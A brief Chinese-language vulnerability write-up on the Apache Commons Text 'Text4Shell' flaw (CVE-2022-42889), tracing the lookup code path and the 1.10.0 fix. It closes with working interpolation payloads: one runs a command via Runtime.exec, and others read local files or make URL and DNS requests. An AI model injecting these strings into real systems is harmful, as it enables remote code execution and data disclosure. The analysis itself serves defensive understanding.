CVE-2022-42889 Apache Commons Text RCE (Text4Shell)
2022-10-13 19:12:46 Author: y4er.com(查看原文) 阅读量:19 收藏

https://twitter.com/Y4tacker/status/1580193254665920513?s=20&t=mq9URhmKSa7xADbSY4r2fw

看到了这个推特,于是自己看了一眼。

1.9有一个script的标签

https://commons.apache.org/proper/commons-text/apidocs/org/apache/commons/text/lookup/StringLookupFactory.html

https://y4er.com/img/uploads/CVE-2022-42889-apache-commons-text-rce/1.png

org.apache.commons.text.lookup.InterpolatorStringLookup#lookup

https://y4er.com/img/uploads/CVE-2022-42889-apache-commons-text-rce/2.png

切出来key标签script

org.apache.commons.text.lookup.ScriptStringLookup#lookup

https://y4er.com/img/uploads/CVE-2022-42889-apache-commons-text-rce/3.png

调用ScriptEngineManager执行代码。

1.10.0修复在addDefaultStringLookups添加默认lookup时不再添加script、url、dns标签

https://y4er.com/img/uploads/CVE-2022-42889-apache-commons-text-rce/4.png

org.apache.commons.text.lookup.StringLookupFactory.DefaultStringLookupsHolder#createDefaultStringLookups

https://y4er.com/img/uploads/CVE-2022-42889-apache-commons-text-rce/5.png

1
2
3
4
5
6
${script:js:java.lang.Runtime.getRuntime().exec('calc')}
${file:utf8:e:/test.txt}
${url:utf8:http://baidu.com}
${url:utf8:file:///e:/test.txt}
${dns:address|baidu.com}
${xml:/tmp/aaa:/xpathexpression}

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。


文章来源: https://y4er.com/posts/cve-2022-42889-apache-commons-text-rce/
如有侵权请联系:admin#unsafe.sh